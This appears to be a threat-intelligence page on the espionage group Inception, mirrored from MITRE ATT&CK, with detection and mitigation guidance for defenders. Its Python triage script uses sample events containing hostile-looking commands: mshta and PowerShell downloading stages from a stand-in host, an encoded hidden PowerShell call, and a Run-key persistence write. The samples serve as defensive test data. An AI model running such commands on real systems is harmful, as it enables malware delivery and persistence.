G0100: Inception
Analyst context for executives and security teams
Inception is an ATT&CK group entry for a cyber espionage actor active since at least 2014, with reporting tied to targeting of government and multiple industries across Russia and other global regions. The defensive value is not the group name alone; it is the pattern of behaviors ATT&CK associates with it: targeted attachment-based entry, client-side exploitation, script-based execution, discovery, credential collection from browsers, persistence through Windows startup mechanisms, and command-and-control that may blend into web traffic or proxy chains.
Executive priority
Treat this as a readiness benchmark for espionage-style intrusions rather than as proof of current exposure. Leaders should ask whether email security, endpoint visibility, identity monitoring, browser credential controls, PowerShell/VBScript governance, and outbound web traffic review are producing usable evidence for investigations. The ATT&CK relationships also support vulnerability-management focus on client application exposure, because exploitation for client execution and malicious files are part of the mapped behavior set.
Technical view
The group object has no ATT&CK-provided detection text and no platform listed on the intrusion-set record, so validation should be driven by the related software and techniques. Related software includes PowerShower, a Windows PowerShell backdoor used for reconnaissance and second-stage payload execution; VBShower, a Windows backdoor/downloader; and LaZagne, a post-exploitation password recovery tool with Windows, Linux, and macOS modules. SOC and IR teams should validate visibility across suspicious Office/document execution chains, PowerShell and Visual Basic activity, mshta.exe and regsvr32.exe proxy execution, Run key or Startup folder persistence, browser credential access, host discovery commands, local file collection, and outbound HTTP/S or web-service-based C2 patterns, including traffic obscured by proxies or encryption.
Likely telemetry
- Email gateway and mailbox telemetry for spearphishing attachments and malicious file delivery
- Endpoint process creation telemetry for PowerShell, Visual Basic-related interpreters, mshta.exe, regsvr32.exe, discovery commands, and downloader behavior
- PowerShell logging where available, including script block, module, and command-line evidence
- Windows registry and startup folder change events for Run key or logon persistence
- File system telemetry for document template references, encoded or encrypted payload files, local data staging, and file/directory enumeration
Detection direction
- Do not rely on a single group signature; build coverage around the mapped behaviors and software relationships.
- Tune detections for suspicious parent-child process chains from email clients, document viewers, archive tools, scripting engines, mshta.exe, and regsvr32.exe.
- Validate PowerShell monitoring for reconnaissance, download, and second-stage execution patterns associated with PowerShower-like behavior, while accounting for legitimate administration noise.
- Monitor VBScript/Visual Basic execution paths and downloader behavior consistent with VBShower-like staging, especially when followed by PowerShell execution.
- Correlate discovery activity, browser credential access, and outbound web traffic rather than treating each signal independently.
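As an added example (not code from the page, MITRE, or Glexia), the following Python scores constructed process-creation events against the parent-child chains, script-interpreter patterns, Run key writes, and discovery commands listed above, then aggregates per host so the signals are judged together. Process names, weights, and the sample command lines are assumptions chosen for illustration.

```python
from collections import defaultdict, namedtuple

# Parents a user-opened attachment typically runs under: mail client, document viewers, archive tools.
USER_FACING_PARENTS = {"outlook.exe", "winword.exe", "excel.exe", "acrord32.exe", "winrar.exe", "7zfm.exe"}
# Interpreters and proxy-execution binaries from the mapped techniques (T1059.001/.005, T1218.005/.010).
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe", "regsvr32.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient", "http")
DISCOVERY_IMAGES = {"systeminfo.exe", "tasklist.exe", "whoami.exe", "net.exe"}  # T1082 / T1057 / T1069.002 style
RUN_KEY = r"\currentversion\run"  # T1547.001 autostart location, matched on the lower-cased command line

ProcEvent = namedtuple("ProcEvent", "host parent image cmdline")  # assumed minimal process-creation record

def score_event(ev):
    """Score one process-creation event; each reason names the mapped behavior that matched."""
    parent, image, cmd = ev.parent.lower(), ev.image.lower(), ev.cmdline.lower()
    hits = []
    if parent in USER_FACING_PARENTS and image in SCRIPT_CHILDREN:
        hits.append((5, f"{parent} spawned {image}"))
    if image in POWERSHELL and any(m in cmd for m in DOWNLOAD_MARKERS):
        hits.append((4, "powershell download / second-stage pattern"))
    if image in POWERSHELL and "-enc" in cmd:  # -EncodedCommand and its short forms
        hits.append((2, "encoded powershell command line"))
    if image in {"mshta.exe", "regsvr32.exe"} and "http" in cmd:
        hits.append((4, f"{image} given a remote location"))
    if RUN_KEY in cmd:
        hits.append((3, "run key autostart write"))
    if image in DISCOVERY_IMAGES:
        hits.append((1, f"host discovery via {image}"))
    return sum(s for s, _ in hits), [r for _, r in hits]

def triage(events):
    """Aggregate per host so script chains, persistence and discovery are weighed together, not one at a time."""
    per_host = defaultdict(lambda: [0, []])
    for ev in events:
        score, reasons = score_event(ev)
        per_host[ev.host][0] += score
        per_host[ev.host][1].extend(reasons)
    return {host: (score, reasons) for host, (score, reasons) in per_host.items()}

# Constructed sample telemetry (not real data): ws01 shows a chained attachment-to-script sequence, ws02 routine admin use.
SAMPLE_EVENTS = [
    ProcEvent("ws01", "winword.exe", "mshta.exe", "mshta.exe http://stage.example.invalid/a.hta"),
    ProcEvent("ws01", "mshta.exe", "powershell.exe", "powershell.exe -w hidden -enc <BASE64_PLACEHOLDER>"),
    ProcEvent("ws01", "powershell.exe", "powershell.exe", "powershell.exe Invoke-WebRequest http://stage.example.invalid/s2"),
    ProcEvent("ws01", "powershell.exe", "reg.exe", r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\Users\Public\u.exe"),
    ProcEvent("ws01", "cmd.exe", "systeminfo.exe", "systeminfo"),
    ProcEvent("ws02", "explorer.exe", "powershell.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
]
```

Calling `triage(SAMPLE_EVENTS)` gives ws01 a combined score of 19 with six reasons and ws02 a score of 0, which is the point of correlating rather than alerting on each event alone.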
Mitigation priorities
- Prioritize patching and exposure reduction for client applications that can be reached through user-opened files or attachments.
- Harden email and attachment handling with detonation, file-type controls, and user-reporting workflows where appropriate.
- Restrict and monitor scripting and living-off-the-land utilities such as PowerShell, mshta.exe, and regsvr32.exe based on business need.
- Reduce stored browser credential risk through credential management policy, browser hardening, and monitoring for credential store access.
- Limit persistence opportunities by monitoring and controlling Run keys, Startup folders, and user-writable autostart locations.
Analyst notes and limits
ATT&CK identifies Inception aliases as Inception, Inception Framework, and Cloud Atlas. The related behavior set emphasizes espionage tradecraft: targeted attachment delivery, client-side execution, script-based backdoors/downloaders, discovery, credential access, local data collection, persistence, and web-based C2. The Unit 42 reference title specifically mentions targeting Europe with a year-old Office vulnerability, supporting vulnerability-management relevance without asserting current exploitation.
The official group object does not provide detection guidance, tactics, or platforms directly. Platform and tactic context in this take comes from the supplied relationships to software and techniques, not from the intrusion-set platform field. Local telemetry, asset mix, email architecture, identity controls, and endpoint logging maturity are required to determine actual coverage or risk.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1027.013 | Encrypted/Encoded File | Inception has encrypted malware payloads dropped on victim machines with AES and RC4 encryption. (Citation: Kaspersky Cloud Atlas December 2014) |
| Enterprise | T1588.002 | Tool | |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder | Inception has maintained persistence by modifying Registry run key value |
| Enterprise | T1102 | Web Service | Inception has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe. (Citation: Kaspersky Cloud Atlas December 2014) (Citation: Symantec Inception Framework March 2018) |
| Enterprise | T1090.003 | Multi-hop Proxy | Inception used chains of compromised routers to proxy C2 communications between them and cloud service providers. (Citation: Symantec Inception Framework March 2018) |
| Enterprise | T1518 | Software Discovery | Inception has enumerated installed software on compromised systems. (Citation: Symantec Inception Framework March 2018) |
| Enterprise | T1083 | File and Directory Discovery | Inception used a file listing plugin to collect information about files and directories both on local and remote drives. (Citation: Symantec Inception Framework March 2018) |
| Enterprise | T1566.001 | Spearphishing Attachment | Inception has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise. (Citation: Kaspersky Cloud Atlas December 2014) (Citation: Symantec Inception Framework March 2018) (Citation: Unit 42 Inception November 2018) (Citation: Kaspersky Cloud Atlas August 2019) |
| Enterprise | T1082 | System Information Discovery | Inception has used a reconnaissance module to gather information about the operating system and hardware on the infected host. (Citation: Symantec Inception Framework March 2018) |
| Enterprise | T1059.001 | PowerShell | Inception has used PowerShell to execute malicious commands and payloads. (Citation: Unit 42 Inception November 2018) (Citation: Kaspersky Cloud Atlas December 2014) |
| Enterprise | T1204.002 | Malicious File | Inception lured victims into clicking malicious files for machine reconnaissance and to execute malware. (Citation: Kaspersky Cloud Atlas December 2014) (Citation: Kaspersky Cloud Atlas August 2019) (Citation: Symantec Inception Framework March 2018) (Citation: Unit 42 Inception November 2018) |
| Enterprise | T1071.001 | Web Protocols | Inception has used HTTP, HTTPS, and WebDAV in network communications. (Citation: Kaspersky Cloud Atlas December 2014) (Citation: Unit 42 Inception November 2018) |
| Enterprise | T1005 | Data from Local System | Inception used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host. (Citation: Kaspersky Cloud Atlas August 2019) |
| Enterprise | T1218.005 | Mshta | Inception has used malicious HTA files to drop and execute malware. (Citation: Kaspersky Cloud Atlas August 2019) |
| Enterprise | T1555.003 | Credentials from Web Browsers | Inception used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex. (Citation: Symantec Inception Framework March 2018) |
| Enterprise | T1203 | Exploitation for Client Execution | Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution. (Citation: Kaspersky Cloud Atlas August 2019) (Citation: Kaspersky Cloud Atlas December 2014) (Citation: Symantec Inception Framework March 2018) (Citation: Unit 42 Inception November 2018) |
| Enterprise | T1069.002 | Domain Groups | Inception has used specific malware modules to gather domain membership. (Citation: Symantec Inception Framework March 2018) |
| Enterprise | T1059.005 | Visual Basic | Inception has used VBScript to execute malicious commands and payloads. (Citation: Unit 42 Inception November 2018) (Citation: Kaspersky Cloud Atlas December 2014) |
| Enterprise | T1221 | Template Injection | Inception has used decoy documents to load malicious remote payloads via HTTP. (Citation: Unit 42 Inception November 2018) |
| Enterprise | T1218.010 | Regsvr32 | Inception has ensured persistence at system boot by setting the value |
| Enterprise | T1573.001 | Symmetric Cryptography | Inception has encrypted network communications with AES. (Citation: Kaspersky Cloud Atlas December 2014) |
| Enterprise | T1057 | Process Discovery | Inception has used a reconnaissance module to identify active processes and other associated loaded modules. (Citation: Symantec Inception Framework March 2018) |
Groups, software, and campaigns
S0441: PowerShower
PowerShower is a PowerShell backdoor used by Inception for initial reconnaissance and to download and execute second stage payloads.[1][2]
S0442: VBShower
VBShower is a backdoor that has been used by Inception since at least 2019. VBShower has been used as a downloader for second stage payloads, including PowerShower.[1]
S0349: LaZagne
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the ATT&CK resources page on Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.2 | | Current bundle | 95cfebfb6178… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Unit 42 Inception November 2018: Lancaster, T. (2018, November 5). Inception Attackers Target Europe with Year-old Office Vulnerability. Retrieved May 8, 2020.
[2] Symantec Inception Framework March 2018: Symantec. (2018, March 14). Inception Framework: Alive and Well, and Hiding Behind Proxies. Retrieved May 8, 2020.
[3] Kaspersky Cloud Atlas December 2014: GReAT. (2014, December 10). Cloud Atlas: RedOctober APT is back in style. Retrieved May 8, 2020.
[4] Cloud Atlas (alias): Citation: Kaspersky Cloud Atlas December 2014
[5] Inception (alias): Citation: Symantec Inception Framework March 2018
[6] Inception Framework (alias): Citation: Symantec Inception Framework March 2018
[7] mitre-attack G0100
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.